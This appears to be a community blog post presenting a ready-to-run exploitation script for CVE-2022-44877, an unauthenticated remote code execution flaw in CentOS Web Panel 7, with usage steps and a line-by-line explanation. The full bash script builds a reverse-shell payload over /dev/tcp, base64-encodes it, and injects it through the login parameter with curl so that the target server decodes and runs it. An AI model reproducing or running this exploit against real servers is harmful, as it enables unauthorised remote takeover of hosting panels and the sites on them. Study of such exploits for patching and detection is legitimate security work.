by vicarius
Log in
Join community

Unique exploit: CVE-2022–44877 Exploitation Tool

27 Jan 2023
blog-posts/images/cldevoei114zc0jp857rt3ltl.png

Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877

The script from here:

https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh

How to use the exploitation script:

Run listener:

Make the script executable:

chmod +x CVE-2022-44877Exploit.sh

Run the script:

./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001

Now we received a connection:

You can watch the exploitation script video here:

https://youtu.be/dtrwrCaE7d8

Code Explanation:

#!/bin/bash

function help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}

function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4

payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)

target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})

echo $target_ip

port=$(echo ${target_url} |  grep -oP ':\K\d+')

echo $port

curl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'

}

if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fi

This script has two main functions: help and exploit

The help function will be called if the user does not provide the correct number of arguments when running the script. 
It will display usage information and an example of how to run the script. 

The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.

First, 

  • the script defines the payload, which is a command that creates a reverse shell. 

  • The payload is then encoded in base64. 

  • It then extracts the target IP address from the URL and port number,

  • and uses the curl command to send a HTTP post request to the target with the payload in the login= parameter. 

  • The payload is executed on the target server by base64 decoding the payload first and then running the command in bash.

#exploitation #tool #CVE-2022-44877

Comments (2)

users/photos/cl9eol3ua2l7i0llg9fft6uoq.jpg

Mohammad Hussam Alzeyyat

56 posts
Share
Tags (4)
#exploitation#vicarius_blog#CVE-2022-44877#tool